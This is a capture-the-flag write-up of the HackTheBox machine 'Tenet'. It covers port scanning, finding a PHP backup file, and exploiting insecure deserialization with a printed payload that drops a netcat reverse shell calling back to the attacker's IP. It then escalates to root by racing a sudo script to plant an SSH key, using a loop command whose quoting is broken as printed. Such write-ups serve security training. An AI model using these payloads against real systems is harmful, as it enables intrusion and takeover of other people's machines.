WackyHacker

WackyHacker

Ethical Hacker | CTF challenge player / Red Teamer 🚩󠁵󠁳󠁴󠁸󠁿󠁵󠁳󠁴󠁸󠁿

Tenet - HackTheBox

image (15)

I started by doing a scan with Nmap of the ports and services that the machine has open.

┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ nmap -sS --min-rate=5000 -p- -v -Pn -n 10.10.10.223 -oG allPorts
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-13 15:15 CEST
Initiating SYN Stealth Scan at 15:15
Scanning 10.10.10.223 [65535 ports]
Discovered open port 22/tcp on 10.10.10.223
Discovered open port 80/tcp on 10.10.10.223
Completed SYN Stealth Scan at 15:16, 13.01s elapsed (65535 total ports)
Nmap scan report for 10.10.10.223
Host is up (0.087s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.16 seconds
           Raw packets sent: 65595 (2.886MB) | Rcvd: 65535 (2.621MB)

It has two ports open, the first one is for SSH and the second is a web server that runs on its default port, I did another scan to see the version of each service.

┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ nmap -sC -sV -p22,80 10.10.10.223 -oN targeted                  
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-13 15:16 CEST
Nmap scan report for tenet.htb (10.10.10.223)
Host is up (0.047s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
| 256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_ 256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.6
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Tenet
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.00 seconds

Nmap reported that I was facing a WordPress, I wanted to verify that, so I used “WhatWeb”.

┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ whatweb http://10.10.10.223/                                                                                   
http://10.10.10.223/ [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.10.223], Title[Apache2 Ubuntu Default Page: It works]

“WhatWeb” did not report it to me, but it was indeed a WordPress, I also did a “Fuzzing” with “Gobuster” to see if I could find any potential directories.

┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ gobuster dir -u "http://10.10.10.223/" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.223/
[+] Threads:        20
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/06/13 15:18:35 Starting gobuster
===============================================================
/wordpress (Status: 301)
Progress: 2467 / 220562 (1.12%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/06/13 15:18:45 Finished
===============================================================

I was able to confirm that it was a WordPress, I went to the page to see what was there.

Captura de pantalla (551)

It seems that “Virtual Hosting” was being applied and it was not pointing to the domain that the host is hosting, look at the source code and tenet.htb is the domain that the host was pointing from.

Screenshot (552)

I just included it in /etc/hosts to point to the host and be able to see what I had.

Screenshot (553)

Now I could see what it really contained.

Screenshot (554)

I found a potential user.

Screenshot (556)

I wanted to try it in WordPress since it allows you to enumerate users.

Captura de pantalla (557)

The user was valid, I thought about using brute force, but I wanted to investigate the page further, I also saw this comment that caught my attention.

Screenshot (525)

Trying different things, I came to the conclusion that sator is a subdomain of tenet.htb, I included it in /etc/hosts.

Screenshot (558)

In the comment I also mentioned something about PHP along with sator, I tried to join them and see if it was a PHP file, apparently it was, this is what I had.

Screenshot (559)

The comment was talking about a “backup”, so I decided to try adding a .bak to the sator.php file and it downloaded a file.

Screenshot (560)

I made a cat to see its contents.

Screenshot (561)

Apparently it was the source code of sator.php, this was going to allow me to rather plan the next step of the intrusion, what the code does is receive an input from the arepo parameter and deserializes it, this was an insecure deserialization attack by PHP like a house, now what I had to do was create the serialized malicious code so that in the deserialization it executes my malicious statement in PHP, in this case a reverse shell by netcat.

This is the PHP code I used for serialization.

┌─[root@parrot][/home/wackyhacker/Desktop]
└──╼ php --interactive
php > class DatabaseExport {
php > public $user_file = 'shell.php';
php > public $data = '<?php shell_exec("bash -c \'bash -i >& /dev/tcp/10.10.16.5/443 0>&1\'"); ?>'; }
php > print urlencode(serialize(new DatabaseExport));

Once serialized I introduced it into the “arepo” input (http://10.10.10.223/sator.php?arepo={serialize_code})

Screenshot (562)

And I gave myself a shell via netcat.

Screenshot (563)

I did a TTY treatment and tried to view the “user” flag but I didn’t have permissions, I had to become the user neil.

Screenshot (568)

I remembered I was dealing with a WordPress, so I found and viewed its configuration file which contains the password.

Screenshot (566)

I tried authenticating as neil and it worked.

Screenshot (567)

ESCALADA DE PRIVILEGIOS

I looked at the “flag”, now all that was missing was the privilege escalation, I did a sudo -l to see if something could be executed as the ROOT user and I found a script.

Screenshot (569)

I catned the absolute path with xargs to see what it did.

Screenshot (570)

What the script does is create an id_rsa.pub key and host it in /tmp/ssh-{XXXXX}->(random characters) and then copy the contents of the file to known_hosts. If we have the ability to include our public key in /tmp before it is copied to known_hosts we can start SSH as the ROOT user. To do this I used the following command in a window authenticated in SSH as the user neil.

neil@tenet~$ while true; do echo "{SSH_PUBLIC} | tee /tmp/ssh* > /dev/null; done"

Screenshot (571)

And in another window with SSH as the user neil I gave the script execute permissions and ran it recursively a few times.

Captura de pantalla (572)

neil@tenet~$ sudo ./usr/local/bin/enableSSH.sh

and…

Captura de pantalla (573)

Leave a comment